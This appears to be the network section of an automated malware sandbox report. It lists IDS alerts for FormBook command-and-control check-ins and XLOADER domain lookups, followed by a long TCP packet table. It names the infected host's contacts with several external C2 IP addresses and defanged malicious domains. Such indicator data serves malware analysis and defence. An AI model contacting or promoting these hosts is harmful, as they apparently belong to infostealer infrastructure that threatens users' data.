192.168.0.56137.220.225.5449182802031412 08/23/23-14:55:48.955698	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49182	80	192.168.0.56	137.220.225.54
192.168.0.56146.148.179.23149169802031412 08/23/23-14:53:20.544201	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49169	80	192.168.0.56	146.148.179.231
192.168.0.5634.102.136.18049175802031412 08/23/23-14:54:55.545868	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49175	80	192.168.0.56	34.102.136.180
192.168.0.56192.0.78.2549184802031412 08/23/23-14:56:13.017651	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49184	80	192.168.0.56	192.0.78.25
192.168.0.564.2.2.260999532047696 08/23/23-14:52:49.208493	UDP	2047696	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com)	60999	53	192.168.0.56	4.2.2.2
192.168.0.564.2.2.157563532047686 08/23/23-14:55:06.724095	UDP	2047686	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .brioche-amsterdam .com)	57563	53	192.168.0.56	4.2.2.1
192.168.0.56104.21.26.18249177802031412 08/23/23-14:55:06.782645	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49177	80	192.168.0.56	104.21.26.182
192.168.0.564.2.2.257483532047695 08/23/23-14:52:34.627928	UDP	2047695	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com)	57483	53	192.168.0.56	4.2.2.2
192.168.0.564.2.2.163416532047696 08/23/23-14:52:48.789953	UDP	2047696	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com)	63416	53	192.168.0.56	4.2.2.1
192.168.0.5666.29.151.12149165802031412 08/23/23-14:52:20.486977	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49165	80	192.168.0.56	66.29.151.121
192.168.0.5666.29.151.12149180802031412 08/23/23-14:55:37.109666	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49180	80	192.168.0.56	66.29.151.121
192.168.0.564.2.2.164276532047693 08/23/23-14:54:44.293405	UDP	2047693	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud)	64276	53	192.168.0.56	4.2.2.1
192.168.0.564.2.2.257571532047696 08/23/23-14:56:02.353133	UDP	2047696	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com)	57571	53	192.168.0.56	4.2.2.2
192.168.0.56146.148.179.23149188802031412 08/23/23-14:56:33.382881	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49188	80	192.168.0.56	146.148.179.231
192.168.0.56137.220.225.5449166802031412 08/23/23-14:52:35.399112	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.0.56	137.220.225.54
192.168.0.56188.114.96.349168802031412 08/23/23-14:53:10.078120	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49168	80	192.168.0.56	188.114.96.3
192.168.0.56188.114.96.349186802031412 08/23/23-14:56:23.049901	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49186	80	192.168.0.56	188.114.96.3
192.168.0.56172.67.200.5049179802031412 08/23/23-14:55:16.860596	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49179	80	192.168.0.56	172.67.200.50
192.168.0.564.2.2.154348532047691 08/23/23-14:53:10.036329	UDP	2047691	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .spv88 .online)	54348	53	192.168.0.56	4.2.2.1
192.168.0.564.2.2.155180532047697 08/23/23-14:52:20.278710	UDP	2047697	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .growind .info)	55180	53	192.168.0.56	4.2.2.1
192.168.0.56104.21.71.14949190802031412 08/23/23-14:57:11.019298	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49190	80	192.168.0.56	104.21.71.149
192.168.0.56104.21.71.14949170802031412 08/23/23-14:53:59.333245	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.0.56	104.21.71.149
192.168.0.564.2.2.255184532047693 08/23/23-14:54:42.194250	UDP	2047693	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud)	55184	53	192.168.0.56	4.2.2.2
192.168.0.56185.215.4.5749171802031412 08/23/23-14:54:09.796497	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49171	80	192.168.0.56	185.215.4.57
192.168.0.564.2.2.164207532047696 08/23/23-14:56:02.979015	UDP	2047696	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com)	64207	53	192.168.0.56	4.2.2.1
192.168.0.564.2.2.154298532047695 08/23/23-14:52:32.525567	UDP	2047695	ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com)	54298	53	192.168.0.56	4.2.2.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 14:52:20.315114021 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.486479044 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.486879110 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.486977100 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.658153057 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790690899 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790693998 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790695906 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790697098 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790698051 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.790699959 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.791001081 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.791002989 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.791323900 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.791325092 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.791994095 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.792177916 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.792445898 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.963891983 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964175940 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964755058 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964756966 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964759111 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964760065 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964761972 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964762926 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964765072 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964766026 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964766979 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964767933 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.964770079 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965105057 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.965346098 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965348005 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965348959 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965351105 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965349913 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.965353012 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965354919 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965356112 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965357065 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:20.965971947 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.966522932 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:20.966618061 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:21.488410950 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:21.488498926 CEST	49165	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:52:21.659975052 CEST	80	49165	66.29.151.121	192.168.0.56
Aug 23, 2023 14:52:35.038264990 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:35.398729086 CEST	80	49166	137.220.225.54	192.168.0.56
Aug 23, 2023 14:52:35.399065018 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:35.399111986 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:35.762950897 CEST	80	49166	137.220.225.54	192.168.0.56
Aug 23, 2023 14:52:35.763166904 CEST	80	49166	137.220.225.54	192.168.0.56
Aug 23, 2023 14:52:35.763463020 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:35.763506889 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:36.124428988 CEST	80	49166	137.220.225.54	192.168.0.56
Aug 23, 2023 14:52:36.124779940 CEST	49166	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:52:59.870014906 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:52:59.879287004 CEST	80	49167	192.0.78.25	192.168.0.56
Aug 23, 2023 14:52:59.880287886 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:52:59.880393982 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:52:59.888806105 CEST	80	49167	192.0.78.25	192.168.0.56
Aug 23, 2023 14:53:00.032476902 CEST	80	49167	192.0.78.25	192.168.0.56
Aug 23, 2023 14:53:00.032511950 CEST	80	49167	192.0.78.25	192.168.0.56
Aug 23, 2023 14:53:00.032974005 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:53:00.032974005 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:53:00.033023119 CEST	49167	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:53:00.041439056 CEST	80	49167	192.0.78.25	192.168.0.56
Aug 23, 2023 14:53:10.067646027 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.076947927 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.078052998 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.078119993 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.086908102 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099064112 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099066973 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099069118 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099070072 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099071980 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099072933 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.099073887 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:10.100333929 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.100333929 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.100405931 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.100405931 CEST	49168	80	192.168.0.56	188.114.96.3
Aug 23, 2023 14:53:10.109368086 CEST	80	49168	188.114.96.3	192.168.0.56
Aug 23, 2023 14:53:20.393521070 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:20.543872118 CEST	80	49169	146.148.179.231	192.168.0.56
Aug 23, 2023 14:53:20.544157028 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:20.544200897 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:20.947252035 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:21.097757101 CEST	80	49169	146.148.179.231	192.168.0.56
Aug 23, 2023 14:53:21.097759962 CEST	80	49169	146.148.179.231	192.168.0.56
Aug 23, 2023 14:53:21.098937035 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:21.099033117 CEST	49169	80	192.168.0.56	146.148.179.231
Aug 23, 2023 14:53:21.249295950 CEST	80	49169	146.148.179.231	192.168.0.56
Aug 23, 2023 14:53:59.324156046 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.332896948 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:53:59.333190918 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.333245039 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.342024088 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:53:59.742211103 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:53:59.742213964 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:53:59.742532969 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:53:59.743397951 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.743514061 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.743514061 CEST	49170	80	192.168.0.56	104.21.71.149
Aug 23, 2023 14:53:59.752139091 CEST	80	49170	104.21.71.149	192.168.0.56
Aug 23, 2023 14:54:09.775243998 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:09.795286894 CEST	80	49171	185.215.4.57	192.168.0.56
Aug 23, 2023 14:54:09.796431065 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:09.796497107 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:09.816289902 CEST	80	49171	185.215.4.57	192.168.0.56
Aug 23, 2023 14:54:09.842232943 CEST	80	49171	185.215.4.57	192.168.0.56
Aug 23, 2023 14:54:09.842267990 CEST	80	49171	185.215.4.57	192.168.0.56
Aug 23, 2023 14:54:09.842489004 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:09.842489004 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:09.842577934 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:10.096699953 CEST	49171	80	192.168.0.56	185.215.4.57
Aug 23, 2023 14:54:10.117079020 CEST	80	49171	185.215.4.57	192.168.0.56
Aug 23, 2023 14:54:30.972832918 CEST	49172	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.981482029 CEST	80	49172	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:30.982487917 CEST	49172	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.982856989 CEST	49172	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.982939959 CEST	49172	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.982950926 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.990850925 CEST	80	49172	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:30.991127014 CEST	80	49173	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:30.991373062 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.991425991 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:30.999752998 CEST	80	49173	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.033072948 CEST	80	49172	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.133722067 CEST	80	49172	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.133755922 CEST	80	49172	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.134052038 CEST	49172	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:31.143328905 CEST	80	49173	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.143625021 CEST	80	49173	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:31.144335985 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:31.144377947 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:31.144681931 CEST	49173	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:54:31.152843952 CEST	80	49173	192.0.78.25	192.168.0.56
Aug 23, 2023 14:54:55.514031887 CEST	49174	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.529522896 CEST	80	49174	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.529758930 CEST	49174	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.530060053 CEST	49174	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.530145884 CEST	49174	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.530194044 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.545449972 CEST	80	49174	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.545550108 CEST	80	49175	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.545814991 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.545867920 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.550772905 CEST	80	49174	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.561317921 CEST	80	49175	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.652010918 CEST	80	49174	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.652044058 CEST	80	49174	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.652312994 CEST	49174	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.667485952 CEST	80	49175	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.667516947 CEST	80	49175	34.102.136.180	192.168.0.56
Aug 23, 2023 14:54:55.667762995 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.667817116 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.667817116 CEST	49175	80	192.168.0.56	34.102.136.180
Aug 23, 2023 14:54:55.683434010 CEST	80	49175	34.102.136.180	192.168.0.56
Aug 23, 2023 14:55:06.762092113 CEST	49176	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.771378994 CEST	80	49176	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.772362947 CEST	49176	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.772650003 CEST	49176	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.772735119 CEST	49176	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.772747993 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.781501055 CEST	80	49176	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.781503916 CEST	80	49177	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.782603025 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.782644987 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.782810926 CEST	80	49176	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.783837080 CEST	49176	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.791831970 CEST	80	49177	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.804220915 CEST	80	49177	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.804223061 CEST	80	49177	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:06.805366993 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.805367947 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.805449963 CEST	49177	80	192.168.0.56	104.21.26.182
Aug 23, 2023 14:55:06.814127922 CEST	80	49177	104.21.26.182	192.168.0.56
Aug 23, 2023 14:55:16.840878010 CEST	49178	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.849865913 CEST	80	49178	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.851072073 CEST	49178	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.851361036 CEST	49178	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.851448059 CEST	49178	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.851454973 CEST	49179	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.860217094 CEST	80	49178	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.860250950 CEST	80	49179	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.860553026 CEST	49179	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.860595942 CEST	49179	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.861205101 CEST	80	49178	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.861491919 CEST	49178	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.869151115 CEST	80	49179	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.888818979 CEST	80	49179	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.888851881 CEST	80	49179	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:16.889748096 CEST	49179	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.889790058 CEST	49179	80	192.168.0.56	172.67.200.50
Aug 23, 2023 14:55:16.898468971 CEST	80	49179	172.67.200.50	192.168.0.56
Aug 23, 2023 14:55:36.939888954 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.109106064 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.109608889 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.109666109 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.278561115 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.402868986 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.402901888 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.402920961 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.402942896 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403217077 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.403217077 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.403283119 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403304100 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403359890 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403378010 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403395891 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403414965 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.403529882 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.403670073 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572000027 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572031021 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572050095 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572068930 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572088003 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572149038 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572290897 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572310925 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572365046 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572396040 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572475910 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572524071 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572592020 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572732925 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572827101 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.572879076 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572899103 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.572971106 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573086977 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.573142052 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573160887 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573178053 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573224068 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573251963 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.573350906 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573436022 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.573616028 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.573623896 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573642969 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573702097 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:37.573918104 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:37.574012995 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:38.114129066 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:38.114180088 CEST	49180	80	192.168.0.56	66.29.151.121
Aug 23, 2023 14:55:38.283060074 CEST	80	49180	66.29.151.121	192.168.0.56
Aug 23, 2023 14:55:48.119750977 CEST	49181	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.629579067 CEST	80	49181	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:48.629910946 CEST	49181	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.630136013 CEST	49181	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.630219936 CEST	49181	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.630390882 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.955355883 CEST	80	49182	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:48.955653906 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:48.955698013 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:49.084820032 CEST	80	49181	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.085002899 CEST	80	49181	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.085022926 CEST	80	49181	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.085339069 CEST	49181	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:49.280492067 CEST	80	49182	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.280524969 CEST	80	49182	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.280738115 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:49.280823946 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:55:49.632596970 CEST	80	49182	137.220.225.54	192.168.0.56
Aug 23, 2023 14:55:49.632929087 CEST	49182	80	192.168.0.56	137.220.225.54
Aug 23, 2023 14:56:12.999960899 CEST	49183	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.008414984 CEST	80	49183	192.0.78.25	192.168.0.56
Aug 23, 2023 14:56:13.008677959 CEST	49183	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.008902073 CEST	49183	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.008991957 CEST	49183	80	192.168.0.56	192.0.78.25
Aug 23, 2023 14:56:13.008991957 CEST	49184	80	192.168.0.56	192.0.78.25
